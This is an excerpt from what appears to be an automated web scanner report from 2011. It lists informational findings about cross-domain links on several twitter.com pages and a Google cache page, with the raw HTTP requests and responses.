<a href="/tedtalks" class="avatar" hreflang="en" target="_blank"><img alt="tedtalks" border="0" height="48" src="http://a0.twimg.com/profile_images/386937621/TwitterBugTEDTalks_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AmyJane" class="avatar-sm" hreflang="en" id="icon_AmyJane" rel="AmyJane" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/58688822/wildflower_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AmyJane" class="avatar" hreflang="en" target="_blank"><img alt="AmyJane" border="0" height="48" src="http://a1.twimg.com/profile_images/58688822/wildflower_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/washingtonpost" class="avatar-sm" hreflang="en" id="icon_washingtonpost" rel="washingtonpost" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/1180316859/getsocial-blue_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/washingtonpost" class="avatar" hreflang="en" target="_blank"><img alt="washingtonpost" border="0" height="48" src="http://a0.twimg.com/profile_images/1180316859/getsocial-blue_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.205. http://twitter.com/newtwitter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/newtwitter

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/newtwitter?autoplay=true

The response contains the following links to other domains:

http://a1.twimg.com/a/1296609216/images/favicon.ico
http://a2.twimg.com/a/1296609216/stylesheets/newtwitter.css?1296614487
http://assets0.zendesk.com/external/zenbox/overlay.js
http://www.youtube.com/v/rIpD7hfffQo?fs=1&hl=en&hd=1&showinfo=0&autoplay=1&showsearch=0

Request

GET /newtwitter?autoplay=true HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664216-81697-46878
ETag: "af1680cf98a15b7f71029ac98ec3d28c"
Last-Modified: Wed, 02 Feb 2011 16:30:16 GMT
X-Runtime: 0.02851
Content-Type: text/html; charset=utf-8
Content-Length: 6372
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<m
...[SNIP]...
</title>
<link href="http://a2.twimg.com/a/1296609216/stylesheets/newtwitter.css?1296614487" media="screen" rel="stylesheet" type="text/css" />
<link href="http://a1.twimg.com/a/1296609216/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
</head>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/rIpD7hfffQo?fs=1&hl=en&hd=1&showinfo=0&autoplay=1&showsearch=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="700" height="418"></embed>
...[SNIP]...
</style>
<script type="text/javascript" src="//assets0.zendesk.com/external/zenbox/overlay.js"></script>
...[SNIP]...

17.206. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/search?q=Early+Spring

The response contains the following links to other domains:

http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png
http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296615671
http://a1.twimg.com/a/1296609216/images/favicon.ico
http://a1.twimg.com/a/1296609216/images/twitter_57.png
http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=Early+Spring HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664219-13007-60448
ETag: "522f467622d3b8bc682725725d333eb3"
Last-Modified: Wed, 02 Feb 2011 16:30:19 GMT
X-Runtime: 0.09862
Content-Type: text/html; charset=utf-8
Content-Length: 19287
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296609216/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296609216/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296615671" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.207. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/search?q=Kung+Hei+Fat+Choi

The response contains the following links to other domains:

http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png
http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296614487
http://a1.twimg.com/a/1296609216/images/favicon.ico
http://a1.twimg.com/a/1296609216/images/twitter_57.png
http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=Kung+Hei+Fat+Choi HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664216-50167-47180
ETag: "fe365ee4ee69072225469860c37ae85a"
Last-Modified: Wed, 02 Feb 2011 16:30:16 GMT
X-Runtime: 0.07001
Content-Type: text/html; charset=utf-8
Content-Length: 19312
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296609216/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296609216/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296614487" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.208. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/search?q=Lake+Shore+Drive

The response contains the following links to other domains:

http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png
http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296611148
http://a1.twimg.com/a/1296609216/images/favicon.ico
http://a1.twimg.com/a/1296609216/images/twitter_57.png
http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=Lake+Shore+Drive HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664229-49631-58026
ETag: "304de171e660221899b6ebd01c8d09de"
Last-Modified: Wed, 02 Feb 2011 16:30:29 GMT
X-Runtime: 0.06887
Content-Type: text/html; charset=utf-8
Content-Length: 19293
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296609216/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296609216/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296611148" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.209. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/search?q=Punxsutawney+Phil

The response contains the following links to other domains:

http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png
http://a1.twimg.com/a/1296609216/images/favicon.ico
http://a1.twimg.com/a/1296609216/images/twitter_57.png
http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a2.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296611745
http://a3.twimg.com/a/1296609216/stylesheets/fronts.css?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=Punxsutawney+Phil HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664218-9002-11216
ETag: "9007626036dbcf331b486a8554eb2a7e"
Last-Modified: Wed, 02 Feb 2011 16:30:18 GMT
X-Runtime: 0.05054
Content-Type: text/html; charset=utf-8
Content-Length: 19325
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296609216/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296609216/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a3.twimg.com/a/1296609216/stylesheets/fronts.css?1296611745" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.210. http://twitter.com/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/share

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/share?url=

The response contains the following links to other domains:

http://s.twimg.com/images/favicon.ico
http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css

Request

GET /share?url= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Wed, 02 Feb 2011 15:42:32 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1296661352-65804-24629
Last-Modified: Wed, 02 Feb 2011 15:42:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296661350388308; path=/; expires=Wed, 09-Feb-11 15:42:30 GMT; domain=.twitter.com
Set-Cookie: guest_id=129666135220443032; path=/; expires=Fri, 04 Mar 2011 15:42:32 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA4PCuctAToHaWQiJWJkMzM4ODgxN2NhMDg1%250AMTMwMzJjYWMzODYxM2RmZDZjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--79a93455255a238dc33a8624da7a5aa94ff52472; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...
</title>
<link href="http://s.twimg.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css" type="text/css" charset="utf-8">

<style type="text/css" media="screen">
...[SNIP]...

17.211. http://webcache.googleusercontent.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webcache.googleusercontent.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com

The response contains the following links to other domains:

http://millenniumhotelstst.122.2o7.net/b/ss/MillenniumHotelsTst/1/H.2--NS/0?[AQB]&cdp=3&[AQE]
http://s7.addthis.com/js/250/addthis_widget.js?username=mcilus
http://track.roiservice.com/track/track.aspx?ROIID=936138107000019
http://twitter.com/millenniumpr
http://www.addthis.com/bookmark.php?v=250&username=mcilus
http://www.adobe.com/go/getflash/
http://www.facebook.com/MillenniumHotels
http://www.faneuilhallmarketplace.com/
http://www.google.com/intl/en/help/features_list.html
http://www.i-meet.com/millennium
http://www.millenniumhotels.com/corporate/contact_us/enquiriesReservation.html
http://www.millenniumhotels.com/corporate/faq/faq.html
http://www.millenniumhotels.com/corporate/hotels/copthorneHotels.html
http://www.millenniumhotels.com/corporate/hotels/hotelsMillennium.html
http://www.millenniumhotels.com/corporate/hotels/kingsgateHotels.html
http://www.millenniumhotels.com/corporate/index.html
http://www.millenniumhotels.com/corporate/investor_relations/financialLibrary.html
http://www.millenniumhotels.com/corporate/legalInfo.html
http://www.millenniumhotels.com/corporate/privacyPolicy.html
http://www.millenniumhotels.com/corporate/siteMap.html
http://www.millenniumhotels.com/corporate/termsConditions.html
http://www.millenniumhotels.com/img/img_calendar.gif
http://www.millenniumhotels.com/img/millennium/btn_search.gif
http://www.millenniumhotels.com/img/millennium/leftnav_05a.gif
http://www.millenniumhotels.com/inc/s_code.js
http://www.millenniumhotels.com/inc_cty/mbox.js
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.neaq.org/index.php
http://www.northendboston.com/
http://www.thefreedomtrail.org/

Request

GET /search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:42:43 GMT
Expires: -1
Cache-Control: private, max-age=0
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
